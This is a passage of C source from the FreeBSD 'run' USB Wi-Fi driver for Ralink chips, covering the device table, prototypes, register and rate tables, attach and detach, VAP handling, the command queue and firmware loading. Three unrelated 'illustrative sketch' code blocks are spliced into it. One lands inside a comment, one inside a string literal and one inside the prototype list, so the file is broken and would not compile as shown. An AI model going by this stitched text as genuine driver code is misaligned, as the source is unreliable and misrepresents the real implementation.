RUN_DEV(SITECOMEU, RT3070_2), RUN_DEV(SITECOMEU, RT3070_3), RUN_DEV(SITECOMEU, RT3070_4), RUN_DEV(SITECOMEU, RT3071), RUN_DEV(SITECOMEU, RT3072_1), RUN_DEV(SITECOMEU, RT3072_2), RUN_DEV(SITECOMEU, RT3072_3), RUN_DEV(SITECOMEU, RT3072_4), RUN_DEV(SITECOMEU, RT3072_5), RUN_DEV(SITECOMEU, RT3072_6), RUN_DEV(SITECOMEU, WL608), RUN_DEV(SPARKLAN, RT2870_1), RUN_DEV(SPARKLAN, RT3070), RUN_DEV(SWEEX2, LW153), RUN_DEV(SWEEX2, LW303), RUN_DEV(SWEEX2, LW313), RUN_DEV(TOSHIBA, RT3070), RUN_DEV(UMEDIA, RT2870_1), RUN_DEV(ZCOM, RT2870_1), RUN_DEV(ZCOM, RT2870_2), RUN_DEV(ZINWELL, RT2870_1), RUN_DEV(ZINWELL, RT2870_2), RUN_DEV(ZINWELL, RT3070), RUN_DEV(ZINWELL, RT3072_1), RUN_DEV(ZINWELL, RT3072_2), RUN_DEV(ZYXEL, RT2870_1), RUN_DEV(ZYXEL, RT2870_2), RUN_DEV(ZYXEL, NWD2705), RUN_DEV_EJECT(RALINK, RT_STOR), #undef RUN_DEV_EJECT #undef RUN_DEV }; static device_probe_t run_match; static device_attach_t run_attach; static device_detach_t run_detach; static usb_callback_t run_bulk_rx_callback; static usb_callback_t run_bulk_tx_callback0; static usb_callback_t run_bulk_tx_callback1; static usb_callback_t run_bulk_tx_callback2; static usb_callback_t run_bulk_tx_callback3; static usb_callback_t run_bulk_tx_callback4; static usb_callback_t run_bulk_tx_callback5; static void run_autoinst(void *, struct usb_device *, struct usb_attach_arg *); static int run_driver_loaded(struct module *, int, void *); static void run_bulk_tx_callbackN(struct usb_xfer *xfer, usb_error_t error, u_int index); static struct ieee80211vap *run_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void run_vap_delete(struct ieee80211vap *); static void run_cmdq_cb(void *, int); 
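/*
 * Illustrative sketch (user-space stand-in) of the RUN_CMDQ_GET()/
 * run_cmdq_cb() deferral scheme used by this driver: producers claim a slot
 * with an atomic fetch-and-add, the mask wraps the index around a
 * power-of-two ring, and the taskqueue callback later drains the slots in
 * the same order without taking the softc lock in the producer path.  C11
 * atomics stand in for FreeBSD's atomic_fetchadd_32 here.
 */
#include <stdatomic.h>
#include <stdint.h>

#define CMDQ_SIZE       16              /* must be a power of two */
#define CMDQ_MASK       (CMDQ_SIZE - 1)

static _Atomic uint32_t cmdq_store;

static uint32_t
cmdq_claim_slot(void)
{
        /*
         * Returns 0,1,...,15,0,1,...; concurrent callers get distinct
         * slots as long as the ring does not overflow.
         */
        return atomic_fetch_add(&cmdq_store, 1) & CMDQ_MASK;
}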
static void run_setup_tx_list(struct run_softc *, struct run_endpoint_queue *); static void run_unsetup_tx_list(struct run_softc *, struct run_endpoint_queue *); static int run_load_microcode(struct run_softc *); static int run_reset(struct run_softc *); static usb_error_t run_do_request(struct run_softc *, struct usb_device_request *, void *); static int run_read(struct run_softc *, uint16_t, uint32_t *); static int run_read_region_1(struct run_softc *, uint16_t, uint8_t *, int); static int run_write_2(struct run_softc *, uint16_t, uint16_t); static int run_write(struct run_softc *, uint16_t, uint32_t); static int run_write_region_1(struct run_softc *, uint16_t, const uint8_t *, int); static int run_set_region_4(struct run_softc *, uint16_t, uint32_t, int); static int run_rf3593_efuse_read_1(struct run_softc *, uint16_t, uint16_t *); static int run_efuse_read(struct run_softc *, uint16_t, uint16_t *, int); static int run_efuse_read_2(struct run_softc *, uint16_t, uint16_t *); static int run_eeprom_read_2(struct run_softc *, uint16_t, uint16_t *); static int run_rt2870_rf_write(struct run_softc *, uint32_t); static int run_rt3070_rf_read(struct run_softc *, uint8_t, uint8_t *); static int run_rt3070_rf_write(struct run_softc *, uint8_t, uint8_t); static int run_bbp_read(struct run_softc *, uint8_t, uint8_t *); static int run_bbp_write(struct run_softc *, uint8_t, uint8_t); static int run_mcu_cmd(struct run_softc *, uint8_t, uint16_t); static const char *run_get_rf(uint16_t); static void run_rt3593_get_txpower(struct run_softc *); static void run_get_txpower(struct run_softc *); static int run_read_eeprom(struct run_softc *); static struct ieee80211_node *run_node_alloc(struct ieee80211vap *, const uint8_t mac[IEEE80211_ADDR_LEN]); static int run_media_change(struct ifnet *); static int run_newstate(struct ieee80211vap *, enum ieee80211_state, int); static int run_wme_update(struct ieee80211com *); static void run_wme_update_cb(void *); static void run_key_update_begin(struct ieee80211vap *); static void run_key_update_end(struct ieee80211vap *); static void run_key_set_cb(void *); static int run_key_set(struct ieee80211vap *, struct ieee80211_key *, const uint8_t mac[IEEE80211_ADDR_LEN]); static void run_key_delete_cb(void *); static int run_key_delete(struct ieee80211vap *, struct ieee80211_key *); static void run_ratectl_to(void *); static void run_ratectl_cb(void *, int); static void run_drain_fifo(void *); static void run_iter_func(void *, struct ieee80211_node *); static void run_newassoc_cb(void *); static void run_newassoc(struct ieee80211_node *, int); static void run_rx_frame(struct run_softc *, struct mbuf *, uint32_t); static void run_tx_free(struct run_endpoint_queue *pq, struct run_tx_data *, int); static void run_set_tx_desc(struct run_softc *, struct run_tx_data *); static int run_tx(struct run_softc *, struct mbuf *, struct ieee80211_node *); static int run_tx_mgt(struct run_softc *, struct mbuf *, struct ieee80211_node *); static int run_sendprot(struct run_softc *, const struct mbuf *, struct ieee80211_node *, int, int); static int run_tx_param(struct run_softc *, struct mbuf *, struct ieee80211_node *, const struct ieee80211_bpf_params *); static int run_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static void run_start(struct ifnet *); static int run_ioctl(struct ifnet *, u_long, caddr_t); static void run_iq_calib(struct run_softc *, u_int); static void run_set_agc(struct run_softc *, uint8_t); static void 
run_select_chan_group(struct run_softc *, int); static void run_set_rx_antenna(struct run_softc *, int); static void run_rt2870_set_chan(struct run_softc *, u_int); static void run_rt3070_set_chan(struct run_softc *, u_int); static void run_rt3572_set_chan(struct run_softc *, u_int); static void run_rt3593_set_chan(struct run_softc *, u_int); static void run_rt5390_set_chan(struct run_softc *, u_int); static void run_rt5592_set_chan(struct run_softc *, u_int); static int run_set_chan(struct run_softc *, struct ieee80211_channel *); static void run_set_channel(struct ieee80211com *); static void run_scan_start(struct ieee80211com *); static void run_scan_end(struct ieee80211com *); static void run_update_beacon(struct ieee80211vap *, int); static void run_update_beacon_cb(void *); static void run_updateprot(struct ieee80211com *); static void run_updateprot_cb(void *); static void run_usb_timeout_cb(void *); static void run_reset_livelock(struct run_softc *); static void run_enable_tsf_sync(struct run_softc *); static void run_enable_mrr(struct run_softc *); static void run_set_txpreamble(struct run_softc *); static void run_set_basicrates(struct run_softc *); static void run_set_leds(struct run_softc *, uint16_t); static void run_set_bssid(struct run_softc *, const uint8_t *); static void run_set_macaddr(struct run_softc *, const uint8_t *); static void run_updateslot(struct ifnet *); static void run_updateslot_cb(void *); static void run_update_mcast(struct ifnet *); static int8_t run_rssi2dbm(struct run_softc *, uint8_t, uint8_t); static void run_update_promisc_locked(struct ifnet *); static void run_update_promisc(struct ifnet *); static void run_rt5390_bbp_init(struct run_softc *); static int run_bbp_init(struct run_softc *); static int run_rt3070_rf_init(struct run_softc *); static void run_rt3593_rf_init(struct run_softc *); static void run_rt5390_rf_init(struct run_softc *); static int run_rt3070_filter_calib(struct run_softc *, uint8_t, uint8_t, uint8_t *); static void run_rt3070_rf_setup(struct run_softc *); static void run_rt3593_rf_setup(struct run_softc *); static void run_rt5390_rf_setup(struct run_softc *); static int run_txrx_enable(struct run_softc *); static void run_adjust_freq_offset(struct run_softc *); static void run_init(void *); static void run_init_locked(struct run_softc *); static void run_stop(void *); static void run_delay(struct run_softc *, u_int); static eventhandler_tag run_etag; static const struct rt2860_rate { uint8_t rate; uint8_t mcs; enum ieee80211_phytype phy; uint8_t ctl_ridx; uint16_t sp_ack_dur; uint16_t lp_ack_dur; } rt2860_rates[] = { { 2, 0, IEEE80211_T_DS, 0, 314, 314 }, { 4, 1, IEEE80211_T_DS, 1, 258, 162 }, { 11, 2, IEEE80211_T_DS, 2, 223, 127 }, { 22, 3, IEEE80211_T_DS, 3, 213, 117 }, { 12, 0, IEEE80211_T_OFDM, 4, 60, 60 }, { 18, 1, IEEE80211_T_OFDM, 4, 52, 52 }, { 24, 2, IEEE80211_T_OFDM, 6, 48, 48 }, { 36, 3, IEEE80211_T_OFDM, 6, 44, 44 }, { 48, 4, IEEE80211_T_OFDM, 8, 44, 44 }, { 72, 5, IEEE80211_T_OFDM, 8, 40, 40 }, { 96, 6, IEEE80211_T_OFDM, 8, 40, 40 }, { 108, 7, IEEE80211_T_OFDM, 8, 40, 40 } }; static const struct { uint16_t reg; uint32_t val; } rt2870_def_mac[] = { RT2870_DEF_MAC }; static const struct { uint8_t reg; uint8_t val; } rt2860_def_bbp[] = { RT2860_DEF_BBP },rt5390_def_bbp[] = { RT5390_DEF_BBP },rt5592_def_bbp[] = { RT5592_DEF_BBP }; /* * Default values for BBP register R196 for RT5592. 
*/ static const uint8_t rt5592_bbp_r196[] = { 0xe0, 0x1f, 0x38, 0x32, 0x08, 0x28, 0x19, 0x0a, 0xff, 0x00, 0x16, 0x10, 0x10, 0x0b, 0x36, 0x2c, 0x26, 0x24, 0x42, 0x36, 0x30, 0x2d, 0x4c, 0x46, 0x3d, 0x40, 0x3e, 0x42, 0x3d, 0x40, 0x3c, 0x34, 0x2c, 0x2f, 0x3c, 0x35, 0x2e, 0x2a, 0x49, 0x41, 0x36, 0x31, 0x30, 0x30, 0x0e, 0x0d, 0x28, 0x21, 0x1c, 0x16, 0x50, 0x4a, 0x43, 0x40, 0x10, 0x10, 0x10, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x7d, 0x14, 0x32, 0x2c, 0x36, 0x4c, 0x43, 0x2c, 0x2e, 0x36, 0x30, 0x6e }; static const struct rfprog { uint8_t chan; uint32_t r1, r2, r3, r4; } rt2860_rf2850[] = { RT2860_RF2850 }; struct { uint8_t n, r, k; } rt3070_freqs[] = { RT3070_RF3052 }; static const struct rt5592_freqs { uint16_t n; uint8_t k, m, r; } rt5592_freqs_20mhz[] = { RT5592_RF5592_20MHZ },rt5592_freqs_40mhz[] = { RT5592_RF5592_40MHZ }; static const struct { uint8_t reg; uint8_t val; } rt3070_def_rf[] = { RT3070_DEF_RF },rt3572_def_rf[] = { RT3572_DEF_RF },rt3593_def_rf[] = { RT3593_DEF_RF },rt5390_def_rf[] = { RT5390_DEF_RF },rt5392_def_rf[] = { RT5392_DEF_RF },rt5592_def_rf[] = { RT5592_DEF_RF },rt5592_2ghz_def_rf[] = { RT5592_2GHZ_DEF_RF },rt5592_5ghz_def_rf[] = { RT5592_5GHZ_DEF_RF }; static const struct { u_int firstchan; u_int lastchan; uint8_t reg; uint8_t val; } rt5592_chan_5ghz[] = { RT5592_CHAN_5GHZ }; static const struct usb_config run_config[RUN_N_XFER] = { [RUN_BULK_TX_BE] = { .type = UE_BULK, .endpoint = UE_ADDR_ANY, .ep_index = 0, .direction = UE_DIR_OUT, .bufsize = RUN_MAX_TXSZ, .flags = {.pipe_bof = 1,.force_short_xfer = 1,}, .callback = run_bulk_tx_callback0, .timeout = 5000, /* ms */ }, [RUN_BULK_TX_BK] = { .type = UE_BULK, .endpoint = UE_ADDR_ANY, .direction = UE_DIR_OUT, .ep_index = 1, .bufsize = RUN_MAX_TXSZ, .flags = {.pipe_bof = 1,.force_short_xfer = 1,}, .callback = run_bulk_tx_callback1, .timeout = 5000, /* ms */ }, [RUN_BULK_TX_VI] = { .type = UE_BULK, .endpoint = UE_ADDR_ANY, .direction = UE_DIR_OUT, .ep_index = 2, .bufsize = RUN_MAX_TXSZ, .flags = {.pipe_bof = 1,.force_short_xfer = 1,}, .callback = run_bulk_tx_callback2, .timeout = 5000, /* ms */ }, [RUN_BULK_TX_VO] = { .type = UE_BULK, .endpoint = UE_ADDR_ANY, .direction = UE_DIR_OUT, .ep_index = 3, .bufsize = RUN_MAX_TXSZ, .flags = {.pipe_bof = 1,.force_short_xfer = 1,}, .callback = run_bulk_tx_callback3, .timeout = 5000, /* ms */ }, [RUN_BULK_TX_HCCA] = { .type = UE_BULK, .endpoint = UE_ADDR_ANY, .direction = UE_DIR_OUT, .ep_index = 4, .bufsize = RUN_MAX_TXSZ, .flags = {.pipe_bof = 1,.force_short_xfer = 1,.no_pipe_ok = 1,}, .callback = run_bulk_tx_callback4, .timeout = 5000, /* ms */ }, [RUN_BULK_TX_PRIO] = { .type = UE_BULK, .endpoint = UE_ADDR_ANY, .direction = UE_DIR_OUT, .ep_index = 5, .bufsize = RUN_MAX_TXSZ, .flags = {.pipe_bof = 1,.force_short_xfer = 1,.no_pipe_ok = 1,}, .callback = run_bulk_tx_callback5, .timeout = 5000, /* ms */ }, [RUN_BULK_RX] = { .type = UE_BULK, .endpoint = UE_ADDR_ANY, .direction = UE_DIR_IN, .bufsize = RUN_MAX_RXSZ, .flags = {.pipe_bof = 1,.short_xfer_ok = 1,}, .callback = run_bulk_rx_callback, } }; static void run_autoinst(void *arg, struct usb_device *udev, struct usb_attach_arg *uaa) { struct usb_interface *iface; struct usb_interface_descriptor *id; if (uaa->dev_state != UAA_DEV_READY) return; iface = usbd_get_iface(udev, 0); if (iface == NULL) return; id = iface->idesc; if (id == NULL || id->bInterfaceClass != UICLASS_MASS) return; if (usbd_lookup_id_by_uaa(run_devs, sizeof(run_devs), uaa)) return; if (usb_msc_eject(udev, 0, 
MSC_EJECT_STOPUNIT) == 0) uaa->dev_state = UAA_DEV_EJECTING; } static int run_driver_loaded(struct module *mod, int what, void *arg) { switch (what) { case MOD_LOAD: run_etag = EVENTHANDLER_REGISTER(usb_dev_configured, run_autoinst, NULL, EVENTHANDLER_PRI_ANY); break; case MOD_UNLOAD: EVENTHANDLER_DEREGISTER(usb_dev_configured, run_etag); break; default: return (EOPNOTSUPP); } return (0); } static int run_match(device_t self) { struct usb_attach_arg *uaa = device_get_ivars(self); if (uaa->usb_mode != USB_MODE_HOST) return (ENXIO); if (uaa->info.bConfigIndex != 0) return (ENXIO); if (uaa->info.bIfaceIndex != RT2860_IFACE_INDEX) return (ENXIO); return (usbd_lookup_id_by_uaa(run_devs, sizeof(run_devs), uaa)); } static int run_attach(device_t self) { struct run_softc *sc = device_get_softc(self); struct usb_attach_arg *uaa = device_get_ivars(self); struct ieee80211com *ic; struct ifnet *ifp; uint32_t ver; int ntries, error; uint8_t iface_index, bands; device_set_usb_desc(self); sc->sc_udev = uaa->device; sc->sc_dev = self; mtx_init(&sc->sc_mtx, device_get_nameunit(sc->sc_dev), MTX_NETWORK_LOCK, MTX_DEF); iface_index = RT2860_IFACE_INDEX; error = usbd_transfer_setup(uaa->device, &iface_index, sc->sc_xfer, run_config, RUN_N_XFER, sc, &sc->sc_mtx); if (error) { device_printf(self, "could not allocate USB transfers, " "err=%s\n", usbd_errstr(error)); goto detach; } RUN_LOCK(sc); /* wait for the chip to settle */ for (ntries = 0; ntries < 100; ntries++) { if (run_read(sc, RT2860_ASIC_VER_ID, &ver) != 0) { RUN_UNLOCK(sc); goto detach; } if (ver != 0 && ver != 0xffffffff) break; run_delay(sc, 10); } if (ntries == 100) { device_printf(sc->sc_dev, "timeout waiting for NIC to initialize\n"); RUN_UNLOCK(sc); goto detach; } sc->mac_ver = ver >> 16; sc->mac_rev = ver & 0xffff; /* retrieve RF rev. 
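/*
 * Illustrative sketch: the 32-bit word read from RT2860_ASIC_VER_ID above
 * splits into a MAC version in the high half and a revision in the low
 * half; the sample value in the comment is made up for illustration,
 * e.g. 0x28600500 -> mac_ver 0x2860, mac_rev 0x0500.
 */
#include <stdint.h>

static void
split_asic_ver(uint32_t ver, uint16_t *mac_ver, uint16_t *mac_rev)
{
        *mac_ver = ver >> 16;
        *mac_rev = ver & 0xffff;
}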
no and various other things from EEPROM */ run_read_eeprom(sc); device_printf(sc->sc_dev, "MAC/BBP RT%04X (rev 0x%04X), RF %s (MIMO %dT%dR), address %s\n", sc->mac_ver, sc->mac_rev, run_get_rf(sc->rf_rev), sc->ntxchains, sc->nrxchains, ether_sprintf(sc->sc_bssid)); RUN_UNLOCK(sc); ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(sc->sc_dev, "can not if_alloc()\n"); goto detach; } ic = ifp->if_l2com; ifp->if_softc = sc; if_initname(ifp, "run", device_get_unit(sc->sc_dev)); ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = run_init; ifp->if_ioctl = run_ioctl; ifp->if_start = run_start; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); ic->ic_ifp = ifp; ic->ic_phytype = IEEE80211_T_OFDM; /* not only, but not used */ ic->ic_opmode = IEEE80211_M_STA; /* default to BSS mode */ /* set device capabilities */ ic->ic_caps = IEEE80211_C_STA | /* station mode supported */ IEEE80211_C_MONITOR | /* monitor mode supported */ IEEE80211_C_IBSS | IEEE80211_C_HOSTAP | IEEE80211_C_WDS | /* 4-address traffic works */ IEEE80211_C_MBSS | IEEE80211_C_SHPREAMBLE | /* short preamble supported */ IEEE80211_C_SHSLOT | /* short slot time supported */ IEEE80211_C_WME | /* WME */ IEEE80211_C_WPA; /* WPA1|WPA2(RSN) */ ic->ic_cryptocaps = IEEE80211_CRYPTO_WEP | IEEE80211_CRYPTO_AES_CCM | IEEE80211_CRYPTO_TKIPMIC | IEEE80211_CRYPTO_TKIP; ic->ic_flags |= IEEE80211_F_DATAPAD; ic->ic_flags_ext |= IEEE80211_FEXT_SWBMISS; bands = 0; setbit(&bands, IEEE80211_MODE_11B); setbit(&bands, IEEE80211_MODE_11G); if (sc->rf_rev == RT2860_RF_2750 || sc->rf_rev == RT2860_RF_2850 || sc->rf_rev == RT3070_RF_3052 || sc->rf_rev == RT3593_RF_3053 || sc->rf_rev == RT5592_RF_5592) setbit(&bands, IEEE80211_MODE_11A); ieee80211_init_channels(ic, NULL, &bands); ieee80211_ifattach(ic, sc->sc_bssid); ic->ic_scan_start = run_scan_start; ic->ic_scan_end = run_scan_end; ic->ic_set_channel = run_set_channel; ic->ic_node_alloc = run_node_alloc; ic->ic_newassoc = run_newassoc; ic->ic_updateslot = run_updateslot; ic->ic_update_mcast = run_update_mcast; ic->ic_wme.wme_update = run_wme_update; ic->ic_raw_xmit = run_raw_xmit; ic->ic_update_promisc = run_update_promisc; ic->ic_vap_create = run_vap_create; ic->ic_vap_delete = run_vap_delete; ieee80211_radiotap_attach(ic, &sc->sc_txtap.wt_ihdr, sizeof(sc->sc_txtap), RUN_TX_RADIOTAP_PRESENT, &sc->sc_rxtap.wr_ihdr, sizeof(sc->sc_rxtap), RUN_RX_RADIOTAP_PRESENT); TASK_INIT(&sc->cmdq_task, 0, run_cmdq_cb, sc); TASK_INIT(&sc->ratectl_task, 0, run_ratectl_cb, sc); usb_callout_init_mtx(&sc->ratectl_ch, &sc->sc_mtx, 0); if (bootverbose) ieee80211_announce(ic); return (0); detach: run_detach(self); return (ENXIO); } static int run_detach(device_t self) { struct run_softc *sc = device_get_softc(self); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic; int i; RUN_LOCK(sc); sc->sc_detached = 1; RUN_UNLOCK(sc); /* stop all USB transfers */ usbd_transfer_unsetup(sc->sc_xfer, RUN_N_XFER); RUN_LOCK(sc); sc->ratectl_run = RUN_RATECTL_OFF; sc->cmdq_run = sc->cmdq_key_set = RUN_CMDQ_ABORT; /* free TX list, if any */ for (i = 0; i != RUN_EP_QUEUES; i++) run_unsetup_tx_list(sc, &sc->sc_epq[i]); RUN_UNLOCK(sc); if (ifp) { ic = ifp->if_l2com; /* drain tasks */ usb_callout_drain(&sc->ratectl_ch); ieee80211_draintask(ic, &sc->cmdq_task); ieee80211_draintask(ic, &sc->ratectl_task); ieee80211_ifdetach(ic); if_free(ifp); } mtx_destroy(&sc->sc_mtx); return (0); } static struct ieee80211vap * run_vap_create(struct 
ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct ifnet *ifp = ic->ic_ifp; struct run_softc *sc = ifp->if_softc; struct run_vap *rvp; struct ieee80211vap *vap; int i; if (sc->rvp_cnt >= RUN_VAP_MAX) { if_printf(ifp, "number of VAPs maxed out\n"); return (NULL); } switch (opmode) { case IEEE80211_M_STA: /* enable s/w bmiss handling for sta mode */ flags |= IEEE80211_CLONE_NOBEACONS; /* fall though */ case IEEE80211_M_IBSS: case IEEE80211_M_MONITOR: case IEEE80211_M_HOSTAP: case IEEE80211_M_MBSS: /* other than WDS vaps, only one at a time */ if (!TAILQ_EMPTY(&ic->ic_vaps)) return (NULL); break; case IEEE80211_M_WDS: TAILQ_FOREACH(vap, &ic->ic_vaps, iv_next){ if(vap->iv_opmode != IEEE80211_M_HOSTAP) continue; /* WDS vap's always share the local mac address. */ flags &= ~IEEE80211_CLONE_BSSID; break; } if (vap == NULL) { if_printf(ifp, "wds only supported in ap mode\n"); return (NULL); } break; default: if_printf(ifp, "unknown opmode %d\n", opmode); return (NULL); } rvp = (struct run_vap *) malloc(sizeof(struct run_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (rvp == NULL) return (NULL); vap = &rvp->vap; if (ieee80211_vap_setup(ic, vap, name, unit, opmode, flags, bssid, mac) != 0) { /* out of memory */ free(rvp, M_80211_VAP); return (NULL); } vap->iv_key_update_begin = run_key_update_begin; vap->iv_key_update_end = run_key_update_end; vap->iv_update_beacon = run_update_beacon; vap->iv_max_aid = RT2870_WCID_MAX; /* * To delete the right key from h/w, we need wcid. * Luckily, there is unused space in ieee80211_key{}, wk_pad, * and matching wcid will be written into there. So, cast * some spells to remove 'const' from ieee80211_key{} */ vap->iv_key_delete = (void *)run_key_delete; vap->iv_key_set = (void *)run_key_set; /* override state transition machine */ rvp->newstate = vap->iv_newstate; vap->iv_newstate = run_newstate; ieee80211_ratectl_init(vap); ieee80211_ratectl_setinterval(vap, 1000 /* 1 sec */); /* complete setup */ ieee80211_vap_attach(vap, run_media_change, ieee80211_media_status); /* make sure id is always unique */ for (i = 0; i < RUN_VAP_MAX; i++) { if((sc->rvp_bmap & 1 << i) == 0){ sc->rvp_bmap |= 1 << i; rvp->rvp_id = i; break; } } if (sc->rvp_cnt++ == 0) ic->ic_opmode = opmode; if (opmode == IEEE80211_M_HOSTAP) sc->cmdq_run = RUN_CMDQ_GO; DPRINTF("rvp_id=%d bmap=%x rvp_cnt=%d\n", rvp->rvp_id, sc->rvp_bmap, sc->rvp_cnt); return (vap); } static void run_vap_delete(struct ieee80211vap *vap) { struct run_vap *rvp = RUN_VAP(vap); struct ifnet *ifp; struct ieee80211com *ic; struct run_softc *sc; uint8_t rvp_id; if (vap == NULL) return; ic = vap->iv_ic; ifp = ic->ic_ifp; sc = ifp->if_softc; RUN_LOCK(sc); m_freem(rvp->beacon_mbuf); rvp->beacon_mbuf = NULL; rvp_id = rvp->rvp_id; sc->ratectl_run &= ~(1 << rvp_id); sc->rvp_bmap &= ~(1 << rvp_id); run_set_region_4(sc, RT2860_SKEY(rvp_id, 0), 0, 128); run_set_region_4(sc, RT2860_BCN_BASE(rvp_id), 0, 512); --sc->rvp_cnt; DPRINTF("vap=%p rvp_id=%d bmap=%x rvp_cnt=%d\n", vap, rvp_id, sc->rvp_bmap, sc->rvp_cnt); RUN_UNLOCK(sc); ieee80211_ratectl_deinit(vap); ieee80211_vap_detach(vap); free(rvp, M_80211_VAP); } /* * There are numbers of functions need to be called in context thread. * Rather than creating taskqueue event for each of those functions, * here is all-for-one taskqueue callback function. This function * gurantees deferred functions are executed in the same order they * were enqueued. 
* '& RUN_CMDQ_MASQ' is to loop cmdq[]. */ static void run_cmdq_cb(void *arg, int pending) { struct run_softc *sc = arg; uint8_t i; /* call cmdq[].func locked */ RUN_LOCK(sc); for (i = sc->cmdq_exec; sc->cmdq[i].func && pending; i = sc->cmdq_exec, pending--) { DPRINTFN(6, "cmdq_exec=%d pending=%d\n", i, pending); if (sc->cmdq_run == RUN_CMDQ_GO) { /* * If arg0 is NULL, callback func needs more * than one arg. So, pass ptr to cmdq struct. */ if (sc->cmdq[i].arg0) sc->cmdq[i].func(sc->cmdq[i].arg0); else sc->cmdq[i].func(&sc->cmdq[i]); } sc->cmdq[i].arg0 = NULL; sc->cmdq[i].func = NULL; sc->cmdq_exec++; sc->cmdq_exec &= RUN_CMDQ_MASQ; } RUN_UNLOCK(sc); } static void run_setup_tx_list(struct run_softc *sc, struct run_endpoint_queue *pq) { struct run_tx_data *data; memset(pq, 0, sizeof(*pq)); STAILQ_INIT(&pq->tx_qh); STAILQ_INIT(&pq->tx_fh); for (data = &pq->tx_data[0]; data < &pq->tx_data[RUN_TX_RING_COUNT]; data++) { data->sc = sc; STAILQ_INSERT_TAIL(&pq->tx_fh, data, next); } pq->tx_nfree = RUN_TX_RING_COUNT; } static void run_unsetup_tx_list(struct run_softc *sc, struct run_endpoint_queue *pq) { struct run_tx_data *data; /* make sure any subsequent use of the queues will fail */ pq->tx_nfree = 0; STAILQ_INIT(&pq->tx_fh); STAILQ_INIT(&pq->tx_qh); /* free up all node references and mbufs */ for (data = &pq->tx_data[0]; data < &pq->tx_data[RUN_TX_RING_COUNT]; data++) { if (data->m != NULL) { m_freem(data->m); data->m = NULL; } if (data->ni != NULL) { ieee80211_free_node(data->ni); data->ni = NULL; } } } static int run_load_microcode(struct run_softc *sc) { usb_device_request_t req; const struct firmware *fw; const u_char *base; uint32_t tmp; int ntries, error; const uint64_t *temp; uint64_t bytes; RUN_UNLOCK(sc); fw = firmware_get("runfw"); RUN_LOCK(sc); if (fw == NULL) { device_printf(sc->sc_dev, "failed loadfirmware of file %s\n", "runfw"); return ENOENT; } if (fw->datasize != 8192) { device_printf(sc->sc_dev, "invalid firmware size (should be 8KB)\n"); error = EINVAL; goto fail; } /* * RT3071/RT3072 use a different firmware * run-rt2870 (8KB) contains both, * first half (4KB) is for rt2870, * last half is for rt3071. */ base = fw->data; if ((sc->mac_ver) != 0x2860 && (sc->mac_ver) != 0x2872 && (sc->mac_ver) != 0x3070) { base += 4096; } /* cheap sanity check */ temp = fw->data; bytes = *temp; if (bytes != be64toh(0xffffff0210280210ULL)) { device_printf(sc->sc_dev, "firmware checksum failed\n"); error = EINVAL; goto fail; } /* write microcode image */ if (sc->mac_ver != 0x3593) { run_write_region_1(sc, RT2870_FW_BASE, base, 4096); run_write(sc, RT2860_H2M_MAILBOX_CID, 0xffffffff); run_write(sc, RT2860_H2M_MAILBOX_STATUS, 0xffffffff); } req.bmRequestType = UT_WRITE_VENDOR_DEVICE; req.bRequest = RT2870_RESET; USETW(req.wValue, 8); USETW(req.wIndex, 0); USETW(req.wLength, 0); if ((error = usbd_do_request(sc->sc_udev, &sc->sc_mtx, &req, NULL)) != 0) { device_printf(sc->sc_dev, "firmware reset failed\n"); goto fail; } run_delay(sc, 10); run_write(sc, RT2860_H2M_BBPAGENT, 0); run_write(sc, RT2860_H2M_MAILBOX, 0); run_write(sc, RT2860_H2M_INTSRC, 0); if ((error = run_mcu_cmd(sc, RT2860_MCU_CMD_RFRESET, 0)) != 0) goto fail; /* wait until microcontroller is ready */ for (ntries = 0; ntries < 1000; ntries++) { if ((error = run_read(sc, RT2860_SYS_CTRL, &tmp)) != 0) goto fail; if (tmp & RT2860_MCU_READY) break; run_delay(sc, 10); } if (ntries == 1000) { device_printf(sc->sc_dev, "timeout waiting for MCU to initialize\n"); error = ETIMEDOUT; goto fail; } device_printf(sc->sc_dev, "firmware %s ver. 
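/*
 * Illustrative sketch of the firmware selection in run_load_microcode()
 * above: the 8 KB "runfw" image carries two 4 KB programs, and every MAC
 * other than RT2860/RT2872/RT3070 uses the second half.  The version bytes
 * printed once loading succeeds sit at offsets 4092/4093 of the chosen half.
 */
#include <stdint.h>

static const uint8_t *
select_fw_half(const uint8_t *image, uint16_t mac_ver)
{
        if (mac_ver == 0x2860 || mac_ver == 0x2872 || mac_ver == 0x3070)
                return image;           /* first 4 KB: RT2870 program */
        return image + 4096;            /* second 4 KB: RT3071 program */
}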
%u.%u loaded\n", (base == fw->data) ? "RT2870" : "RT3071", *(base + 4092), *(base + 4093)); fail: firmware_put(fw, FIRMWARE_UNLOAD); return (error); } static int run_reset(struct run_softc *sc) { usb_device_request_t req; req.bmRequestType = UT_WRITE_VENDOR_DEVICE; req.bRequest = RT2870_RESET; USETW(req.wValue, 1); USETW(req.wIndex, 0); USETW(req.wLength, 0); return (usbd_do_request(sc->sc_udev, &sc->sc_mtx, &req, NULL)); } static usb_error_t run_do_request(struct run_softc *sc, struct usb_device_request *req, void *data) { usb_error_t err; int ntries = 10; RUN_LOCK_ASSERT(sc, MA_OWNED); while (ntries--) { err = usbd_do_request_flags(sc->sc_udev, &sc->sc_mtx, req, data, 0, NULL, 250 /* ms */); if (err == 0) break; DPRINTFN(1, "Control request failed, %s (retrying)\n", usbd_errstr(err)); run_delay(sc, 10); } return (err); } static int run_read(struct run_softc *sc, uint16_t reg, uint32_t *val) { uint32_t tmp; int error; error = run_read_region_1(sc, reg, (uint8_t *)&tmp, sizeof tmp); if (error == 0) *val = le32toh(tmp); else *val = 0xffffffff; return (error); } static int run_read_region_1(struct run_softc 